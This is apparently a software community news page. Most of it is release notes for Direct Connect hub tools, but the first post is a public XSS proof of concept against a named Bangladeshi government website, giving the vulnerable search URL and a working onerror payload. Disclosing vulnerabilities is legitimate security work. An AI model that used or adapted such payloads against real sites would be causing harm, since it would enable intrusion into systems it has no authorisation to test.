Ministry of Defence of Bangladesh - XSS

Vulnerable page: http://www.mod.gov.bd/site/search?key=

PoC
http://www.mod.gov.bd/site/search?key=<!--<img%20src="--><img%20src=x%20onerror=alert(1)//">

You can either enter any XSS code in the search input box, or request any XSS code directly using the GET method and the key parameter.



Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by Neo on 2017-09-07 22:04 | 0 comments | 1 like

AdvOR 0.3.1.4

Changes in 0.3.1.4
- geoip_c.h was updated with GeoIPCountryWhois.csv released on June 7th; there are 153678 IP ranges having 32 ranges in the fake "A1" country; 31 ranges were approximated to real countries
- the OpenSSL library was updated to 1.1.0f

File information: AdvOR 0.3.1.4
Posted by advor on 2017-06-11 10:48 | 0 comments | 2 likes

Blacklist 1.2.2.6

Changes in 1.2.2.6
# 1.2.2.6 - Fixed bypass of public proxy lookup for local and private IP addresses in chat mode

File information: Blacklist 1.2.2.6
Posted by vhpython on 2017-05-22 12:47 | 0 comments | 2 likes

Verlihub 1.0.3.9

Even more stable.

Changes in 1.0.3.9
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.0.3.9
Posted by verlihub on 2017-05-22 12:41 | 0 comments | 2 likes

Ledokol 2.9.3.46

Changes in 2.9.3.46
[ 36] Fixed: Errors on configuration conversion from string to number and vice versa, report by Alexandr
[ 38] Fixed: Lua 5.3 number to string conversions in MySQL queries
[ 39] Fixed: Missing default password value when adding new PM block entry
[ 37] Added: Optional reason to country code gag
[ 40] Added: Optional filter parameter to word ranks command, request by Meka][Meka
[ 41] Added: Split help texts and send on hub help command execution
[ 42] Added: Replacer debug configuration repldebug, request by KCAHDEP
[ 43] Added: IP gag now supports single IP, range or LRE, request by KCAHDEP
[ 44] Added: Forbidden chat nick MyINFO check
[ 45] Added: Column support to Team Elite hublist user search
[ 46] Added: Default type and limit parameters to user logger command, idea by Lord_Zero

File information: Ledokol 2.9.3.46
Posted by ledokol on 2017-05-22 12:34 | 0 comments | 2 likes